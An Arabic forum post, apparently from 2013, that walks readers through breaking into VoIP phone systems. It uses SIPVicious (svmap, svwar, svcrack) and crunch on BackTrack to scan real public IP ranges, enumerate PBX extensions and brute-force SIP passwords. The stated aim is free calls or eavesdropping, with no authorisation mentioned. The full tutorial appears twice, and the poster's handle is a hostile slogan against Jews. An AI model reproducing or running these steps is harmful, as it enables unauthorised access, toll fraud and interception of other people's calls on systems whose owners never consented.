قهر اليهود
10-04-2013, 02:16 AM
السلام عليكم ورحمة الله وبركاته
سأشرح اليوم بحول الله طريقة الحصول على آيبيات إتصال sip في تقنية voip وكيفية الحصول على اليوزرات والباسوردات ب Backtrack 5R1 وذلك لإجراء مكالمات مجانية أو التجسس على المكالمات إلخ ...
أولا نقوم بفتح الترمينال ونكتب
اقتباس:
root@root:~# cd /pentest/voip/sipvicious
ثم بعد ذلك سنقوم بعمل سكان على رنج آيبي لجلب بعض الآيبيات المصابة بإستخدام أداة svmap
اقتباس:
root@root:~# /pentest/voip/sipvicious/svmap.py 190.145.50.0/24
http://img1.imagehousing.com/27/fe0f245f58747ed0cae4f142f0b0ce72.png
كما ترون في الصورة تم الحصول على بعض الآيبيات المصابة
أخي الكريم في حالة لم تحصل على أي آيبي مصاب في هذا الرنج يمكنك تغيير الرنج آيبي
190.145.0.0/24
196.123.74.0/16
إلى نحو ذلك
الآن إخواني سنقوم بإستخراج بعض ايوزرات أو أرقام التحويل المخزنة في PBX
سنستخدم أداة svwar
اقتباس:
root@root:~# cd /pentest/voip/sipvicious/ ./svwar.py 190.145.50.189 -m Invite
http://img1.imagehousing.com/95/abdcf8af3edf0138f224739373107dfe.png
كما ترون في الصورة تم إستخراج بعض اليوزرات
ملاحضة : لمشاهدة كيف تحصل عملية إستخراج اليوزرات يمكنك أخي إضافة - vv
اقتباس:
root@root:~# /pentest/voip/sipvicious/ ./svwar.py 190.145.50.189 -m Invite - vv
الآن سنقوم بعمل قائمة باسوردات بإستخدام أداة crunch
نقوم بفتح ترمينال أخر ونكتب
اقتباس:
root@root:~# cd /pentest/passwords/crunch
أأخي لمشاهدة كيف تعمل الأداة يمكنك كتابة
اقتباس:
root@root:~# /pentest/passwords/crunch# man crunch
هنا سنسقوم بعمل قائمة باسورد تتكون من أرقام من 1 إلى 999999 لأنو الحقيقة في الغالب تكون الباسوردات أرقام
قبل ذلك نقوم بعمل ملف جديد لوضع الباسوردات فيه نفتح ترمينال آخر ونكتب
اقتباس
root@root:~# cd /pentest/voip/sipvicious
ثــــــــم
اقتباس:
root@root:~# /pentest/voip/sipvicious# *> gaza.txt
http://img1.imagehousing.com/70/8548ee607df36b129eda3285dc73241b.png
الآن نقوم بعمل قائمة باسوردات بأداة crunch
اقتباس:
root@root:~# /pentest/passwords/crunch# ./crunch 1 6 -f charset.lst numeric -o /pentest/voip/sipvicious/gaza.txt
http://i54.tinypic.com/2h5ms5l.png
الآن بعد إنشاء قائمة الباسوردات نأتي إلى مرحلة الكراك
سنستخدم أخي الكريم أداة svrack
نكتب أخي كالآتي
اقتباس:
root@root:~# /pentest/voip/sipvicious# svcrack -u231 -w gaza.txt 190.145.50.189
http://i56.tinypic.com/2gxqzh0.png
كما ترون إخواني تم الحصول على الباسورد ، وليس دائما يكون اليوزر مثل الباسورد أحيان تكون الباسورد حروف ..
إنتهى
ارجو تقيم
سأشرح اليوم بحول الله طريقة الحصول على آيبيات إتصال sip في تقنية voip وكيفية الحصول على اليوزرات والباسوردات ب Backtrack 5R1 وذلك لإجراء مكالمات مجانية أو التجسس على المكالمات إلخ ...
أولا نقوم بفتح الترمينال ونكتب
اقتباس:
root@root:~# cd /pentest/voip/sipvicious
ثم بعد ذلك سنقوم بعمل سكان على رنج آيبي لجلب بعض الآيبيات المصابة بإستخدام أداة svmap
اقتباس:
root@root:~# /pentest/voip/sipvicious/svmap.py 190.145.50.0/24
http://img1.imagehousing.com/27/fe0f245f58747ed0cae4f142f0b0ce72.png
كما ترون في الصورة تم الحصول على بعض الآيبيات المصابة
أخي الكريم في حالة لم تحصل على أي آيبي مصاب في هذا الرنج يمكنك تغيير الرنج آيبي
190.145.0.0/24
196.123.74.0/16
إلى نحو ذلك
الآن إخواني سنقوم بإستخراج بعض ايوزرات أو أرقام التحويل المخزنة في PBX
سنستخدم أداة svwar
اقتباس:
root@root:~# cd /pentest/voip/sipvicious/ ./svwar.py 190.145.50.189 -m Invite
http://img1.imagehousing.com/95/abdcf8af3edf0138f224739373107dfe.png
كما ترون في الصورة تم إستخراج بعض اليوزرات
ملاحضة : لمشاهدة كيف تحصل عملية إستخراج اليوزرات يمكنك أخي إضافة - vv
اقتباس:
root@root:~# /pentest/voip/sipvicious/ ./svwar.py 190.145.50.189 -m Invite - vv
الآن سنقوم بعمل قائمة باسوردات بإستخدام أداة crunch
نقوم بفتح ترمينال أخر ونكتب
اقتباس:
root@root:~# cd /pentest/passwords/crunch
أأخي لمشاهدة كيف تعمل الأداة يمكنك كتابة
اقتباس:
root@root:~# /pentest/passwords/crunch# man crunch
هنا سنسقوم بعمل قائمة باسورد تتكون من أرقام من 1 إلى 999999 لأنو الحقيقة في الغالب تكون الباسوردات أرقام
قبل ذلك نقوم بعمل ملف جديد لوضع الباسوردات فيه نفتح ترمينال آخر ونكتب
اقتباس
root@root:~# cd /pentest/voip/sipvicious
ثــــــــم
اقتباس:
root@root:~# /pentest/voip/sipvicious# *> gaza.txt
http://img1.imagehousing.com/70/8548ee607df36b129eda3285dc73241b.png
الآن نقوم بعمل قائمة باسوردات بأداة crunch
اقتباس:
root@root:~# /pentest/passwords/crunch# ./crunch 1 6 -f charset.lst numeric -o /pentest/voip/sipvicious/gaza.txt
http://i54.tinypic.com/2h5ms5l.png
الآن بعد إنشاء قائمة الباسوردات نأتي إلى مرحلة الكراك
سنستخدم أخي الكريم أداة svrack
نكتب أخي كالآتي
اقتباس:
root@root:~# /pentest/voip/sipvicious# svcrack -u231 -w gaza.txt 190.145.50.189
http://i56.tinypic.com/2gxqzh0.png
كما ترون إخواني تم الحصول على الباسورد ، وليس دائما يكون اليوزر مثل الباسورد أحيان تكون الباسورد حروف ..
إنتهى
ارجو تقيم